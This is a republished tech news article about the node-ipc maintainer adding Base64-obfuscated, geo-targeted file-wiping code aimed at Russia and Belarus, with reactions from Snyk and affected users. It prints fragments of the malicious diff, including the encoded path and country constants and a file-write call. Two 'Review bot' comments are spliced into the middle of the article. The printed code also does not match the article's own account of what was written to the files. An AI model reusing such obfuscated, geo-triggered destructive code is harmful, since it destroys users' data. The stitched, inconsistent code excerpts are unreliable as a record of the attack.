A Developer Altered Open Source Software to Wipe Files in Russia

Credit to Author: Dan Goodin, Ars Technica | Date: Sat, 19 Mar 2022 12:00:00 +0000

The developer of a popular open source package has been caught adding malicious code to it, leading to wiped files on computers located in Russia and Belarus. The move was part of a protest that has enraged many users and raised concerns about the safety of free and open source software.

This story originally appeared on Ars Technica, a trusted source for technology news, tech policy analysis, reviews, and more. Ars is owned by WIRED's parent company, Condé Nast.

The package, node-ipc, adds remote interprocess communication and neural networking capabilities to other open source code libraries. As a dependency, node-ipc is automatically downloaded and incorporated into other projects, including ones like Vue.js CLI, which has more than 1 million weekly downloads.

Two weeks ago, the node-ipc author pushed a new version of the library that sabotaged computers in Russia and Belarus, the countries invading Ukraine and providing support for the invasion, respectively. The new release added a function that checked the IP address of any machine on which a project depending on node-ipc ran. When that address geolocated to either Russia or Belarus, the new version wiped files from the machine and replaced their contents with a heart emoji.

To conceal the malice, node-ipc author Brandon Nozaki Miller Base64-encoded the key strings in the change, making it harder for users who wanted to visually inspect the code to see what it did.

This is what those developers saw:

+      const n2 = Buffer.from("Li8=", "base64");
+      const o2 = Buffer.from("Li4v", "base64");
+      const r = Buffer.from("Li4vLi4v", "base64"); 
+      const f = Buffer.from("Lw==", "base64"); 
+      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); 
+      const e = Buffer.from("cnVzc2lh", "base64"); 
+      const i = Buffer.from("YmVsYXJ1cw==", "base64");
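Review bot: these seven constants are Base64-encoded string literals that are only ever used as plain strings (the later h(n2.toString("utf8")) call converts them straight back), so the encoding serves no functional purpose and only hides what the constants contain from a reader of the diff. Short fixed strings like these should be written in the clear; a change that encodes them this way deserves a rejection until the author explains why.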

These constants were then decoded and passed to the timer function, for example:

+          h(n2.toString("utf8"));

The values for the Base64 strings were:

Li8= decodes to ./
Li4v decodes to ../
Li4vLi4v decodes to ../../
Lw== decodes to /
Y291bnRyeV9uYW1l decodes to country_name
cnVzc2lh decodes to russia
YmVsYXJ1cw== decodes to belarus

Inside the timer function, those decoded strings supplied the paths of the files to wipe, and the files were then overwritten with the heart emoji.

+      try { 
+        import_fs3.default.writeFile(i, c.toString("utf8"), function() { 
+        });
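Review bot: the writeFile callback on the last line is empty, so any error from the write (permission denied, missing directory) is silently dropped, and the try block in this excerpt has no visible catch. A file write that deliberately discards both its callback error and any exception is another sign that the author did not want failures to surface; at minimum the callback should log or propagate the error.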

“At this point, a very clear abuse and a critical supply chain security incident will occur for any system on which this npm package will be called upon, if that matches a geolocation of either Russia or Belarus,” wrote Liran Tal, a researcher at Snyk, a security company that tracked the changes and published its findings on Wednesday.

Tal found that the node-ipc author maintains 40 other libraries, with some or all of them also being dependencies for other open source packages. Referring to the node-ipc author’s handle, Tal questioned the wisdom of the protest and its likely fallout on the open source ecosystem as a whole.

“Even if the deliberate and dangerous act of maintainer RIAEvangelist will be perceived by some as a legitimate act of protest, how does that reflect on the maintainer’s future reputation and stake in the developer community?" Tal wrote. "Would this maintainer ever be trusted again to not follow up on future acts in such or even more aggressive actions for any projects they participate in?”

RIAEvangelist also came under fire on Twitter and in open source forums. The new malicious code release, wrote one person claiming to work for a US-based organization that operated a server in Belarus, “resulted in executing your code and wiping over 30,000 messages and files detailing war crimes committed in Ukraine by Russian army and government officials.”

The person, who later took down the post and republished it here, said that the purpose of the Belarusian server was to bypass censorship in that country. The organization’s personnel had already been stretched thin since Russia began its invasion of Ukraine on February 24, the person said, and for reasons that aren’t clear, messages from frontline soldiers and other sensitive data were likely gone forever.

“Personally, me and my colleagues are absolutely devastated,” the person wrote. “All I can say [is] that your little shenanigan did more damage to us than Putin or Lukashenka ever could. Professionally, our counsel suggested filing criminal charges federally, and it's likely we'll be proceeding this way.”

The node-ipc update is just one example of what some researchers are calling protestware. Experts have begun tracking other open source projects that are also releasing updates that call out the brutality of Russia’s war. This spreadsheet lists 21 separate packages that are affected.

One such package is es5-ext, which provides code for the ECMAScript 6 scripting language specification. A new file named postinstall.js, which the developer added on March 7, checks to see if the user’s computer has a Russian IP address, in which case the code prints a “call for peace.”

“The people of Ukraine are fully mobilized and ready to defend their country from the enemy invasion,” the message translated into English read in part. “91% of Ukrainians fully support their President Volodymyr Zelensky and his response to the Russian attack.” 

The protestware event exposes some of the risks posed when armies of volunteer developers produce the code that’s crucial for hundreds or thousands of other applications to run. By default, most package managers resolve a dependency’s version range to the newest release that matches it, so a fresh install pulls in a new version automatically unless the project pins versions or commits a lockfile. That means an update from a single individual has the potential to throw a wrench in an untold number of downstream applications.

This risk was on full display in January, when the developer of two JavaScript libraries with more than 22 million downloads pushed an update that caused more than 21,000 dependent apps to spew gibberish, prefaced by the words “Liberty Liberty Liberty.” An infinite loop produced by the update sent developers scrambling as they attempted to fix their malfunctioning apps.

The disk-wiping function was added to node-ipc versions 10.1.1 and 10.1.2. Following the outcry over the wiper, the developer released updates that removed the malicious function. Snyk recommends that developers stop using the package altogether. If that’s not possible, the company advises using the npm package manager’s override mechanism to force the sabotaged versions to a known good one and pin it there.

“Snyk stands with Ukraine, and we’ve proactively acted to support the Ukrainian people during the ongoing crisis with donations and free service to developers world-wide, as well as taking action to cease business in Russia and Belarus,” Tal wrote. “That said, intentional abuse such as this undermines the global open source community and requires us to flag impacted versions of node-ipc as security vulnerabilities.”
